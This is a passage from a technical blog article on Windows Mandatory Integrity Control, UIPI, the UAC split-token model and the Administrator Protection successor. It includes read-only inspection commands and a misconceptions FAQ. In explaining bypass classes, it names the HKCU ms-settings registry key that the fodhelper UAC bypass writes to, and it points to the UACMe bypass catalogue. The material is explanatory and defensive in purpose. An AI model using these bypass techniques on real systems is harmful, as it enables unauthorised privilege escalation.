&lt;p&gt;The deeper bound is information-flow. Dorothy Denning&apos;s May 1976 &lt;em&gt;Communications of the ACM&lt;/em&gt; paper &lt;em&gt;A lattice model of secure information flow&lt;/em&gt; established the formal framework [@denning-1976]. The underlying limit is fundamental: information-flow enforcement is undecidable in the general case, because verifying that a program never leaks information from class $A$ to class $B$ requires deciding properties of arbitrary programs, which reduces to the halting problem. Denning&apos;s lattice model pairs with a conservative compile-time certification that stays decidable precisely because it over-approximates.&lt;/p&gt;
&lt;p&gt;MIC enforces access control, not information flow. The distinction is essential. Access control answers &lt;em&gt;&quot;can this subject perform this operation on this object?&quot;&lt;/em&gt; decidably, at operation time, by walking the object&apos;s ACEs against the token. Information flow asks &lt;em&gt;&quot;does the final state of this system contain any information derived from data the subject was not authorised to read?&quot;&lt;/em&gt; That is undecidable.&lt;/p&gt;
&lt;p&gt;What this means for UAC: even when MIC perfectly enforces &lt;code&gt;NO_WRITE_UP&lt;/code&gt;, a Low-IL process can still &lt;em&gt;influence&lt;/em&gt; a High-IL process via shared state the High-IL process reads. Forshaw&apos;s January 2026 lazy DOS device directory hijack [@forshaw-adminprot-jan26] is exactly such an attack: it places attacker-controlled state in a location a High-IL process will later read, without ever writing up directly. MIC cannot prevent this; no access-control primitive can. Closing the gap requires information-flow analysis, which is provably undecidable for arbitrary code.&lt;/p&gt;
&lt;h3&gt;The five concrete limits&lt;/h3&gt;
&lt;p&gt;The theoretical bounds map onto five concrete limits any practitioner can observe on a default Windows 11 install.&lt;/p&gt;
&lt;p&gt;The first limit is that no-write-up does not imply no-influence-up. A Low-IL process cannot write to High-IL objects directly, but it can place state (registry keys, files, environment variables, named objects) that a High-IL process will subsequently read or be influenced by. Every fileless UAC bypass in §7.1 walks through this gap.&lt;/p&gt;
&lt;p&gt;The second limit is that &lt;code&gt;NO_READ_UP&lt;/code&gt; is opt-in [@mic-doc]. By default, a Low-IL process can read a High-IL file. This is intentional: accessibility tools, antivirus, and diagnostic utilities depend on cross-IL reads. The cost is that any High-IL data placed at a default-policy location is readable by every Medium-IL or lower process on the system.&lt;/p&gt;
&lt;p&gt;The third limit is that UIPI covers only the windowing layer. Sockets, named pipes, COM, RPC, shared memory, MIDL-defined RPC interfaces, and every other inter-process channel that does not go through &lt;code&gt;win32k.sys&lt;/code&gt; is out of scope [@uipi-wiki]. UIPI is necessary, but it is not sufficient for cross-IL isolation; the full bound requires MIC on the file system, the registry, and every named object the higher-IL process might consume.&lt;/p&gt;
&lt;p&gt;The fourth limit is the same-IL same-desktop attack surface. Two Medium-IL processes on the user&apos;s &lt;code&gt;Default&lt;/code&gt; desktop are not isolated from each other by either MIC or UIPI. They have the same IL (no MIC bound) and they own windows on the same desktop with the same IL (no UIPI bound). Every modern browser sandbox addresses this separately, by combining MIC (the renderer runs at Low IL or Untrusted IL) with AppContainer (capability-based identity isolation) and restricted tokens (&lt;code&gt;CreateRestrictedToken&lt;/code&gt;-style SID denial) [@chromium-sandbox][@appcontainer-isolation]. Where MIC alone is insufficient, the stack layers additional primitives, but those primitives are &lt;em&gt;additions&lt;/em&gt; to MIC, not replacements for it.&lt;/p&gt;
&lt;p&gt;The fifth limit is the auto-elevated-binary surface. As long as a Medium-IL process can cause a High-IL process to come into existence executing user-controllable inputs (registry handlers, DLL search-order resolution, COM moniker activation, command-line arguments), the bypass-research industry has architectural space to operate. The fix would be to apply the Invocation Property strictly, which would break elevation.&lt;/p&gt;
&lt;h3&gt;Why MIC has to be a separate evaluator&lt;/h3&gt;
&lt;p&gt;The Harrison-Ruzzo-Ullman 1976 result is the theoretical reason MIC could not be implemented as discretionary ACEs [@hru-1976]. HRU prove that the &lt;em&gt;safety question&lt;/em&gt; (given an initial access matrix, will any future sequence of operations cause subject $s$ to acquire permission $p$ on object $o$?) is undecidable for the general access-matrix model. That undecidability is what makes mandatory policy necessary as a &lt;em&gt;separate&lt;/em&gt; evaluator: if integrity were encoded as discretionary ACEs, the safety of an object&apos;s integrity label would inherit HRU undecidability through every principal with rights over the ACE.&lt;/p&gt;
&lt;p&gt;By making MIC a separate evaluator with non-discretionary semantics, Windows answers the integrity-safety question in O(1) per access check: compare two SIDs, consult three policy bits, decide. The decidability comes from the separation. MIC is bounded because it is structurally simpler.&lt;/p&gt;
&lt;p&gt;None of the bypass classes in §7 violate any of these limits. They all operate within them. The registry-hijack class places Low-IL state where a High-IL reader will consume it (limit #1). The DLL-search-order class abuses the auto-elevated-binary surface (limit #5). The COM-behaviour-abuse class operates on the absent Invocation Property. Microsoft&apos;s response, repeated for sixteen years, was to acknowledge these as architectural realities of the design rather than as bugs to fix. The bypass-research literature is the empirical map of the access-control versus information-flow gap that no mainstream OS has closed.&lt;/p&gt;
&lt;p&gt;Did Microsoft ever try to actually move the boundary? What does it look like when a security feature finally becomes a security boundary?&lt;/p&gt;
&lt;h2&gt;9. The Adminless Successor and the Open Problems&lt;/h2&gt;
&lt;p&gt;In November 2024, Microsoft did something it had not done in seventeen years. It moved the security-boundary line. &lt;a href=&quot;https://paragmali.com/blog/adminless-how-windows-finally-made-elevation-a-security-boun/&quot; rel=&quot;noopener&quot;&gt;Administrator Protection&lt;/a&gt;, announced as a Windows 11 platform feature, became the first generation in the integrity-level lineage that Microsoft classifies as a security boundary [@admin-protection][@msft-devblog-adminprot]. The reclassification is structurally substantial. It is not Microsoft renaming UAC; it is Microsoft adding the architectural primitives a boundary classification requires.&lt;/p&gt;
&lt;h3&gt;What the split-token model shared, and what Administrator Protection separates&lt;/h3&gt;
&lt;p&gt;The four shared properties between the filtered token and the linked token were the structural reason UAC could not be a security boundary. They are listed verbatim in Forshaw&apos;s May 2017 &lt;em&gt;Reading Your Way Around UAC&lt;/em&gt; framing [@forshaw-reading-uac]: same user SID, same &lt;code&gt;%USERPROFILE%&lt;/code&gt;, same &lt;code&gt;HKCU&lt;/code&gt; hive, same logon-session LUID. Administrator Protection attacks all four.&lt;/p&gt;

The per-user separate identity Windows 11 Administrator Protection provisions at first elevation. Has a different SID, `%USERPROFILE%`, `HKCU` hive, and LUID from the calling user, defeating the registry-hijack class of UAC bypasses by structurally separating elevated-process state from the caller&apos;s state.
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;2007 Split-Token (UAC)&lt;/th&gt;
&lt;th&gt;2024 Administrator Protection&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;User SID&lt;/td&gt;
&lt;td&gt;Same as caller&lt;/td&gt;
&lt;td&gt;Different (per-user System Managed Administrator Account, SMAA)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;%USERPROFILE%&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Same as caller&lt;/td&gt;
&lt;td&gt;Different: &lt;code&gt;C:\Users\ADMIN_&amp;lt;random&amp;gt;\&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;HKCU&lt;/code&gt; registry hive&lt;/td&gt;
&lt;td&gt;Same hive as caller&lt;/td&gt;
&lt;td&gt;Different hive (per-SMAA)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Logon session LUID&lt;/td&gt;
&lt;td&gt;Same session as caller&lt;/td&gt;
&lt;td&gt;Fresh logon session per elevation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Authentication&lt;/td&gt;
&lt;td&gt;Consent click only&lt;/td&gt;
&lt;td&gt;Windows Hello integrated authentication&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Classification&lt;/td&gt;
&lt;td&gt;Security feature, not boundary&lt;/td&gt;
&lt;td&gt;Security boundary&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;SMAA expands as &quot;System Managed Administrator Account&quot; per the May 19, 2025 Microsoft Windows Developer Blog explainer &lt;em&gt;Enhance your application security with Administrator protection&lt;/em&gt; [@msft-devblog-adminprot]. Earlier Microsoft Learn documentation from 2024 used the working name &quot;Adminless&quot; without the SMAA acronym. The corpus&apos;s Adminless / Administrator Protection article (#52) covers the SMAA lifecycle and the Insider-Preview timeline in more depth than this article does.&lt;/p&gt;
&lt;p&gt;The concrete operational consequence of the SMAA identity change is structural defeat of the entire registry-hijack class. When an attacker writes the canonical fodhelper bypass key to &lt;code&gt;HKCU\Software\Classes\ms-settings\shell\open\command&lt;/code&gt;, the attacker writes to the &lt;em&gt;caller&apos;s&lt;/em&gt; HKCU hive. When &lt;code&gt;fodhelper.exe&lt;/code&gt; is then elevated under Administrator Protection, the elevated process runs under the SMAA identity, with the SMAA&apos;s own HKCU hive, which does not contain the attacker&apos;s key. The auto-elevated binary resolves the &lt;code&gt;ms-settings&lt;/code&gt; association via the SMAA&apos;s HKCU, falls through to HKLM, and gets the legitimate handler. The attacker&apos;s bypass is structurally defeated by the identity change, not by a per-binary fix [@admin-protection][@forshaw-adminprot-jan26].&lt;/p&gt;
&lt;h3&gt;The 2025 timeline&lt;/h3&gt;
&lt;p&gt;Administrator Protection&apos;s rollout has been incremental. Microsoft released it as an opt-in toggle in early 2024 Insider Preview builds, then shipped a generally-available implementation in optional update KB5067036 on October 28, 2025 [@forshaw-adminprot-jan26]. The Microsoft Learn &lt;em&gt;Administrator protection&lt;/em&gt; page acknowledges a temporary revert on December 1, 2025 &quot;while an application compatibility issue is dealt with&quot; [@admin-protection][@forshaw-adminprot-jan26]. The expected re-enablement is in 2026.&lt;/p&gt;
&lt;p&gt;Forshaw&apos;s January 26, 2026 Project Zero post &lt;em&gt;Bypassing Windows Administrator Protection&lt;/em&gt; documents the application-compatibility revert with verbatim precision. He notes that &quot;the issue is unlikely to be related to anything described in this blog post,&quot; meaning that the December 2025 revert was a third-party application compatibility regression rather than a security issue with the feature itself [@forshaw-adminprot-jan26]. The revert is operational, not architectural.&lt;/p&gt;
&lt;h3&gt;The 2026 retrospective: nine bypasses, five via UI Access&lt;/h3&gt;
&lt;p&gt;Forshaw&apos;s January and February 2026 Project Zero pair is the canonical modern retrospective on Administrator Protection&apos;s architectural maturity. The January post documents nine separate Administrator Protection bypasses Forshaw reported to Microsoft during the Insider Preview cycle, all of which were fixed before general availability [@forshaw-adminprot-jan26]. The post details one in depth (the lazy DOS device directory hijack) and summarises the rest.&lt;/p&gt;

If the weaknesses in UAC can be mitigated then it can be made a secure boundary. -- James Forshaw, *Bypassing Windows Administrator Protection*, Project Zero, January 26, 2026
&lt;p&gt;The February 2026 follow-on post, &lt;em&gt;Bypassing Administrator Protection by Abusing UI Access&lt;/em&gt;, is the more architecturally significant of the pair. It documents that &lt;strong&gt;five of the nine&lt;/strong&gt; pre-GA Administrator Protection bypasses operated entirely through the &lt;code&gt;uiAccess=true&lt;/code&gt; exemption, the long-standing UIPI carve-out for accessibility software inherited unchanged from Vista 2007 [@forshaw-adminprot-feb26].&lt;/p&gt;
&lt;p&gt;The reading is structural. Administrator Protection successfully closes the bypass surface that the split-token model&apos;s shared identity created (limit #1 through limit #4 in §8). It does &lt;em&gt;not&lt;/em&gt; close the bypass surface created by the UI Access carve-out, because UI Access is a &lt;em&gt;deliberate&lt;/em&gt; exemption from UIPI. Closing UI Access would break screen readers, on-screen keyboards, remote-control tools, and every accessibility utility that depends on cross-IL window-message access. The exemption is necessary; the residual attack surface is the cost of accessibility.&lt;/p&gt;
&lt;p&gt;The three gating conditions for &lt;code&gt;uiAccess=true&lt;/code&gt; (manifest assertion, valid Authenticode signature, admin-only install location) are documented in the &lt;em&gt;Security Considerations for Assistive Technologies&lt;/em&gt; Microsoft Learn page [@uia-security]. Forshaw&apos;s February 2026 post enumerates them verbatim and describes the &lt;code&gt;RAiLaunchAdminProcess&lt;/code&gt; Appinfo RPC entry point the UI-Access bypasses operate through [@forshaw-adminprot-feb26]. The trade press picked up the story immediately: &lt;em&gt;The Register&lt;/em&gt; covered Forshaw&apos;s January 2026 post under the headline &quot;Google researcher sits on UAC bypass for ages, only for it to become valid with new security feature&quot; on January 28, 2026 [@register-2026].&lt;/p&gt;
&lt;h3&gt;The downstream legacy&lt;/h3&gt;
&lt;p&gt;MIC and UIPI outlived UAC. The integrity-SID primitive is the connective tissue of every later sandbox model on Windows.&lt;/p&gt;

flowchart TD
    A[&quot;Integrity-SID primitive&lt;br /&gt;(MIC + UIPI, Vista 2006/2007)&quot;] --&amp;gt; B[&quot;AppContainer&lt;br /&gt;(Windows 8, 2012)&quot;]
    A --&amp;gt; C[&quot;IE Protected Mode&lt;br /&gt;(IE7, Vista 2006)&quot;]
    A --&amp;gt; D[&quot;Edge / Chrome / Firefox sandbox tiers&lt;br /&gt;(2008-present)&quot;]
    A --&amp;gt; E[&quot;Protected Process Light&lt;br /&gt;(Windows 8.1, 2013)&quot;]
    A --&amp;gt; F[&quot;Administrator Protection / SMAA&lt;br /&gt;(Windows 11, 2024)&quot;]
    A --&amp;gt; G[&quot;RunAsPPL for LSASS&lt;br /&gt;(Windows 8.1, 2013)&quot;]
    A --&amp;gt; H[&quot;Office Protected View&lt;br /&gt;(Office 2010+)&quot;]
&lt;p&gt;AppContainer (Windows 8, 2012) layers package SIDs above the integrity SID and rides the same &lt;code&gt;SeAccessCheck&lt;/code&gt; infrastructure [@appcontainer-isolation]. IE Protected Mode (Windows Vista IE7, 2006) was the first non-UAC consumer of Low IL, running browser-rendered content as a Low-IL process before the user&apos;s Medium-IL interactive shell. Modern browser sandbox tiers (Chrome, Edge, Firefox content processes) use Low-IL or Untrusted-IL sandbox processes, layered with AppContainer and restricted tokens [@chromium-sandbox]. &lt;a href=&quot;https://paragmali.com/blog/protected-process-light-when-the-administrator-isnt-enough/&quot; rel=&quot;noopener&quot;&gt;Protected Process Light&lt;/a&gt; (Windows 8.1, 2013) is a signature-based generalisation of the integrity-SID concept that PPL-protects LSASS against &lt;code&gt;OpenProcess&lt;/code&gt; by lower-IL callers. Administrator Protection itself uses the integrity-SID primitive: SMAA processes run at High IL while the calling Medium-IL admin shell stays Medium [@admin-protection].&lt;/p&gt;
&lt;p&gt;The twenty-year experiment was a success. The integrity-level stack did exactly what it was designed to do: bound integrity, not authority. The consent prompt was honestly never the security boundary. Microsoft&apos;s November 2024 reclassification finally promotes a feature to a boundary by adding the architectural support the boundary classification requires (separate identity, separate profile, separate hive, separate LUID, Windows Hello-mediated transition). The bypass-research literature is the empirical proof that the 2007 disclaimer was honest, and the proof that the architecture worked exactly as architected.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; MIC and UIPI outlived UAC. The integrity-SID primitive is the connective tissue of AppContainer, every modern browser sandbox, Protected Mode, Protected Process Light, and the Administrator Protection successor. The yellow dialog is the smallest, most replaceable piece of the system.&lt;/p&gt;
&lt;/blockquote&gt;

On December 1, 2025, Microsoft temporarily reverted Administrator Protection in KB5067036 pending an application-compatibility fix [@admin-protection][@forshaw-adminprot-jan26]. Forshaw&apos;s exact framing matters: &quot;the issue is unlikely to be related to anything described in this blog post.&quot; The revert was *not* a security regression; it was a third-party application-compatibility issue, with re-enablement expected in 2026. As of May 2026, Administrator Protection can be enabled manually on Windows 11 24H2 and later but is not the default on consumer or enterprise SKUs pending re-enablement [@admin-protection].
&lt;h2&gt;10. Inspecting the Stack on a Real Box&lt;/h2&gt;
&lt;p&gt;Every primitive in this article is observable on the Windows install you are reading on. Here are the five commands and the two tools that will let you walk the stack yourself.&lt;/p&gt;
&lt;h3&gt;Inspecting integrity levels&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;whoami /groups | findstr Mandatory&lt;/code&gt; prints the mandatory label of the current process token. From an unelevated PowerShell on an administrator account, it will read &lt;code&gt;Mandatory Label\Medium Mandatory Level&lt;/code&gt;. From an elevated PowerShell, it will read &lt;code&gt;Mandatory Label\High Mandatory Level&lt;/code&gt;. From a renderer-process command inside a Chromium-based browser, it would read &lt;code&gt;Mandatory Label\Low Mandatory Level&lt;/code&gt; or &lt;code&gt;Untrusted Mandatory Level&lt;/code&gt;, depending on the sandbox tier.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;whoami /all&lt;/code&gt; is the longer view. It prints every group SID, every privilege, and the full mandatory label.Process Explorer (and System Informer) will show you the same data graphically, but &lt;code&gt;whoami&lt;/code&gt; is the canonical first-party command for getting at the same kernel information from the shell. Run it twice -- once from an unelevated PowerShell, once from an elevated PowerShell on the same admin account -- and diff the outputs to see what the elevation actually changed. That is the empirical re-creation of §1&apos;s hook.&lt;/p&gt;
&lt;p&gt;Sysinternals&apos; Process Explorer has an Integrity column you can add via View / Select Columns / Process Image. Once enabled, it shows the IL of every running process at a glance. System Informer (the open-source Process Explorer successor) supports the same column plus richer SACL inspection. The &lt;code&gt;accesschk -e -l &amp;lt;object&amp;gt;&lt;/code&gt; Sysinternals command prints the mandatory label of a file, registry key, or other securable object: &lt;code&gt;accesschk -e -l C:\Windows\System32\drivers\&lt;/code&gt; reveals the System-IL label that protects the driver directory.&lt;/p&gt;

The PowerShell-native equivalent of `whoami /all` that programs can consume is:&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;[System.Security.Principal.WindowsIdentity]::GetCurrent() |
  Select-Object -ExpandProperty Groups |
  ForEach-Object { $_.Translate([System.Security.Principal.NTAccount]) }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This produces the same SID-to-account-name resolution &lt;code&gt;whoami /groups&lt;/code&gt; does, and is useful inside automation that needs to test deny-only group membership programmatically.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;Inspecting UIPI&lt;/h3&gt;
&lt;p&gt;UIPI is harder to observe directly because the OS does not log dropped messages. The practical demonstration is to run Spy++ (the Visual Studio windowing inspector) from a Medium-IL process and attempt to subclass a window owned by an elevated High-IL process. The subclass call silently fails. &lt;code&gt;SendMessage&lt;/code&gt; returns 0 with &lt;code&gt;GetLastError&lt;/code&gt; reading &lt;code&gt;ERROR_ACCESS_DENIED&lt;/code&gt;. The &lt;code&gt;ChangeWindowMessageFilterEx&lt;/code&gt; documentation page is the Microsoft Learn entry point for understanding the per-window, per-message exemption surface [@changewindowfilter].&lt;/p&gt;
&lt;h3&gt;Enumerating the auto-elevation list&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;sigcheck -m C:\Windows\System32\*.exe | findstr /i autoelevate&lt;/code&gt; walks every executable in &lt;code&gt;System32&lt;/code&gt; and prints the manifest of each. The &lt;code&gt;findstr&lt;/code&gt; filter narrows to lines containing &lt;code&gt;autoElevate&lt;/code&gt;, surfacing the binaries that assert the manifest flag. On a Windows 11 25H2 install, the resulting list runs to thirty to forty binaries. Remember that the manifest-asserting list is &lt;em&gt;not&lt;/em&gt; the same as Appinfo&apos;s internal operational allowlist; the operational subset is what UACMe enumerates [@uacme].&lt;/p&gt;
&lt;h3&gt;Watching Appinfo in action&lt;/h3&gt;
&lt;p&gt;Procmon (Sysinternals Process Monitor) filtered on &lt;code&gt;consent.exe&lt;/code&gt; shows every elevation event: the registry reads against the manifest, the SACL reads on the binary, the token-information queries against the caller&apos;s filtered token. The Windows Event Viewer&apos;s &lt;em&gt;Applications and Services Logs / Microsoft / Windows / User Account Control&lt;/em&gt; channel logs elevation events at the OS level. The combination of Procmon (mechanism) and the Event Viewer (audit trail) is the standard observability surface for elevation operations.&lt;/p&gt;
&lt;h3&gt;A safe lab for the bypass classes&lt;/h3&gt;
&lt;p&gt;UACMe is the community catalogue of 81 documented UAC bypass methods, each with author, technique, target binary, and Windows-version applicability annotations [@uacme]. For inspection of the integrity-level state of running processes from an analyst&apos;s workstation, James Forshaw&apos;s &lt;em&gt;sandbox-attacksurface-analysis-tools&lt;/em&gt; repository (the NtObjectManager, TokenViewer, and NtCoreLib PowerShell modules) is the standard research toolchain [@forshaw-tools]. The UACMe reference implementations (&lt;code&gt;akagi32.exe&lt;/code&gt;, &lt;code&gt;akagi64.exe&lt;/code&gt;) are flagged by Microsoft Defender as &lt;code&gt;HackTool:Win32/Welevate&lt;/code&gt;, the detection name Davidson noted as early as 2009 [@davidson-2009]. This is research tooling, not endpoint operations: run UACMe only on a snapshot VM with Defender exclusions documented, and treat the output as an empirical confirmation of the bypass-research record rather than as an offensive primitive.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The minimum five commands a reader can run on their own Windows box to verify everything in this article: 1. &lt;code&gt;whoami /all&lt;/code&gt; (run twice: once unelevated, once elevated; diff the outputs) 2. &lt;code&gt;whoami /groups | findstr Mandatory&lt;/code&gt; (inspect the IL of the current token) 3. &lt;code&gt;sigcheck -m C:\Windows\System32\eventvwr.exe&lt;/code&gt; (read the autoElevate manifest) 4. &lt;code&gt;tasklist /v /fi &quot;imagename eq svchost.exe&quot; | findstr Appinfo&lt;/code&gt; (confirm the Appinfo service host) 5. Process Explorer with the Integrity column enabled, sorted by IL (the entire stack at a glance) The whole tour takes ten minutes. By the end you will have seen the split-token model, the integrity-level lattice, the auto-elevation allowlist, the Appinfo broker, and the Medium-vs-High distribution of your interactive desktop, with your own eyes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;11. Five Misconceptions That Will Not Die&lt;/h2&gt;
&lt;p&gt;Five UAC misconceptions come up so often in practitioner discussions that any complete treatment owes the reader explicit corrections. Two practical questions round out the FAQ.&lt;/p&gt;

No, and Microsoft&apos;s own documentation has said so since February 2007. The canonical &quot;Neither UAC elevations nor Protected Mode IE define new Windows security boundaries&quot; sentence appears in the *PsExec, User Account Control and Security Boundaries* TechNet Blogs post by Mark Russinovich, dated February 12, 2007 -- see §7.4 for the full quote and the citation-chain disambiguation against the *Inside Windows Vista User Account Control* TechNet Magazine architectural article [@russinovich-blog-2007][@russinovich-tnm-2007]. The boundary line was finally moved in November 2024 with Administrator Protection, which Microsoft does classify as a security boundary [@admin-protection][@forshaw-adminprot-jan26]. The original split-token UAC was never a boundary, by design, and the bypass-research record from 2009 to 2024 is the empirical confirmation that the disclaimer was honest.

No. The Secure Desktop is on the `Winlogon` desktop within `WinSta0`, *within* the user&apos;s interactive session (Session 1, 2, ...) -- §6.1 walks the full Object-Manager hierarchy and contrasts it with the separate Vista Session 0 Isolation feature that moved Windows services into a non-interactive Session 0 [@russinovich-tnm-2007]. The two features ship together in Vista and are constantly confused, but they live at different layers of the Object Manager hierarchy and address different threats.

No. The manifest entry is necessary but not sufficient. Appinfo enforces three additional gates: the binary must carry a valid Microsoft Authenticode signature, the binary must reside under a trusted system directory (`%SystemRoot%\System32` or `%SystemRoot%\SysWOW64`), and the binary&apos;s name must appear on an internal allowlist enforced in code in `appinfo.dll`, not in any user-visible policy file [@davidson-2009][@app-manifests]. Copying `autoElevate=true` into your own binary&apos;s manifest does nothing on its own. The community-standard enumeration technique is `sigcheck -m C:\Windows\System32\*.exe | findstr /i autoelevate`, but that enumerates the manifest-asserting set, not the operational allowlist.

No -- UIPI blocks a specific dangerous subset (window-state mutators, hooks, input injection, journal record / playback); mouse messages, most paint messages, and read-only window queries pass. The complete row-by-row enumeration of blocked vs allowed vs degraded-but-passes message classes is in the §4.2 table. The &quot;blocks all `WM_*`&quot; misconception is one of the most common errors in Windows-security literature [@uipi-wiki][@russinovich-blog-2007].

No. `ShellExecuteEx` with the `&quot;runas&quot;` verb is whole-process elevation: Appinfo creates a new process under the caller&apos;s linked full token, and the new process runs at High IL for its entire lifetime [@shellexecuteexa]. The COM Elevation Moniker is per-object elevation: a Medium-IL caller instantiates a single COM object in a new elevated `dllhost.exe` exposing only that one CLSID&apos;s methods at High IL [@com-elevation-moniker]. The caller stays Medium; only the COM object&apos;s host process is elevated. The bypass-research literature attacks the second surface far more than the first, because per-object elevation exposes a narrower, more abusable *behavioural* surface (the methods of one CLSID), while whole-process elevation requires a path-class bypass like DLL-search-order to weaponise.

Partially. The registry-hijack class (the eventvwr / fodhelper / sdclt / ComputerDefaults family from 2016-2017) is structurally defeated by the SMAA identity change: the attacker writes to the caller&apos;s HKCU hive, but the elevated process runs under the SMAA&apos;s different HKCU hive and never consults the attacker&apos;s key [@admin-protection]. The DLL-search-order class is partially mitigated by the SMAA&apos;s different `%USERPROFILE%` and different working directory. The UI Access class is *not* mitigated: it is the long-standing carve-out for accessibility software, inherited unchanged from Vista 2007, and Forshaw&apos;s February 2026 Project Zero post documents that this carve-out carried five of nine pre-GA Administrator Protection bypasses [@forshaw-adminprot-feb26]. UACMe remains the canonical operational catalogue for the bypass classes that survive Administrator Protection.

No. Setting `EnableLUA=0` in `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System` reverts the OS to the pre-Vista posture: no split-token model, every admin-account process running High-IL by default, every interactive shell holding the full admin SID set and the complete privilege list. The integrity-level *primitive* (MIC) remains in the kernel; the *policy* that makes it operationally useful (the default-Medium-IL filtered token for interactive admins) is disabled. Browser sandbox tiers still function, because they construct restricted Low-IL tokens explicitly. The admin&apos;s daily shell does not benefit, and a malware drop in any process under the admin&apos;s interactive session immediately holds High IL [@uac-how-it-works]. This is structurally the XP situation. Leaving `EnableLUA=1` (the default) is correct on every modern Windows install.
&lt;h2&gt;12. The Plumbing Outlived the Yellow Dialog&lt;/h2&gt;
&lt;p&gt;Return to the two &lt;code&gt;whoami&lt;/code&gt; outputs from §1. The user is the same. The session is the same. The clock has barely moved. Read them again, and now read what each line means.&lt;/p&gt;
&lt;p&gt;The administrator group SID was present in both tokens, marked deny-only on the filtered token and enabled on the elevated token. The integrity level changed from Medium (&lt;code&gt;S-1-16-8192&lt;/code&gt;) to High (&lt;code&gt;S-1-16-12288&lt;/code&gt;). The privilege set expanded from the small user-mode subset to the full administrator set. The bits that moved were the kernel-level token-assignment bits in the new process Appinfo created via &lt;code&gt;CreateProcessAsUser&lt;/code&gt;, using the dormant linked token that LSA had constructed thirty minutes earlier at logon. The yellow dialog was the consent surface on top of a token-swap primitive that existed before the dialog rendered and that can move bits without the dialog (via auto-elevation).&lt;/p&gt;
&lt;p&gt;Four primitives carried the work. Mandatory Integrity Control added an axis to the access check that runs before the DACL and short-circuits on a Low-to-High write attempt, regardless of what the DACL says. User Interface Privilege Isolation closed the cross-IL variant of the shatter-attack class that Paget published in 2002, by dropping the dangerous subset of window messages and hook calls from lower-IL senders to higher-IL receivers. The split-token model gave every administrator a Medium-IL filtered token at logon and held the full token dormant. The Appinfo SYSTEM-trusted broker mediated the token swap when consent or auto-elevation called for it.&lt;/p&gt;
&lt;p&gt;The bypass-research industry of 2009 to 2024 was the empirical confirmation of the architect&apos;s 2007 disclaimer. Davidson&apos;s December 2009 essay opened the auto-elevation surface; Nelson&apos;s 2016-2017 series productised the registry-hijack class; hfiref0x&apos;s UACMe catalogued 81 methods and counting; Forshaw&apos;s 2017 &lt;em&gt;Reading Your Way Around UAC&lt;/em&gt; series named the read-side surface; the cumulative record was a sixteen-year demonstration that UAC was not a security boundary, exactly as Russinovich had publicly stated in February 2007. Microsoft never classified any of these as security vulnerabilities, because the architectural commitment from week one had been that they would not be [@russinovich-blog-2007][@msrc-criteria].&lt;/p&gt;
&lt;p&gt;The November 2024 Administrator Protection reclassification is the line finally moving. The split-token model&apos;s four shared properties between filtered and linked tokens (same SID, same &lt;code&gt;%USERPROFILE%&lt;/code&gt;, same &lt;code&gt;HKCU&lt;/code&gt;, same LUID) are replaced by an SMAA identity that differs on all four dimensions, plus Windows Hello-mediated authentication for every elevation [@admin-protection][@msft-devblog-adminprot]. The registry-hijack class is structurally defeated; the residual surface is the UI Access carve-out inherited unchanged from Vista 2007, which Forshaw&apos;s February 2026 Project Zero post documents as the source of five of nine pre-GA bypasses [@forshaw-adminprot-feb26].&lt;/p&gt;
&lt;p&gt;The yellow dialog is the only piece of UAC most users will ever see. It is also the one piece the OS could replace tomorrow without changing what UAC &lt;em&gt;is&lt;/em&gt;. MIC and UIPI outlived UAC. AppContainer, every modern browser sandbox, IE Protected Mode, Office Protected View, Protected Process Light, and Administrator Protection itself all ride on the integrity-SID and &lt;code&gt;WinSta0&lt;/code&gt; primitives that shipped on January 30, 2007 [@vista-press-release][@appcontainer-isolation][@chromium-sandbox]. The quiet plumbing did the work.&lt;/p&gt;
&lt;p&gt;Next time you click &quot;Yes&quot; on the consent prompt, the bits that move are the same bits that move when Edge spawns a renderer at Low IL, when Defender protects LSASS as PPL, and when a SMAA process shadows your administrator identity on a Windows 11 25H2 install with Administrator Protection enabled. The dialog is the smallest part of the system. Twenty years of empirical research proved Russinovich right: UAC was never the boundary. The integrity-level stack was the quiet plumbing, and Administrator Protection is the later boundary-classified successor [@russinovich-blog-2007][@admin-protection].&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;integrity-level-stack-mic-uipi-uac&quot; keyTerms={[
  { term: &quot;Mandatory Integrity Control (MIC)&quot;, definition: &quot;An access-check evaluator that compares the integrity level of a subject token to the integrity level of a target object before consulting the object&apos;s DACL. Denials short-circuit the access check; integrity beats identity.&quot; },
  { term: &quot;Integrity Level (IL)&quot;, definition: &quot;A well-known SID under S-1-16-X carried on every token and securable object. Seven values: Untrusted, Low, Medium, Medium Plus, High, System, Protected Process.&quot; },
  { term: &quot;User Interface Privilege Isolation (UIPI)&quot;, definition: &quot;The windowing-layer analog of MIC. Blocks dangerous window messages, hooks, and input injection from lower-IL processes targeting higher-IL windows on the same desktop.&quot; },
  { term: &quot;Split-token model&quot;, definition: &quot;Admin Approval Mode: an administrator&apos;s logon produces a Medium-IL filtered token plus a dormant High-IL linked token. The filtered token runs the interactive shell.&quot; },
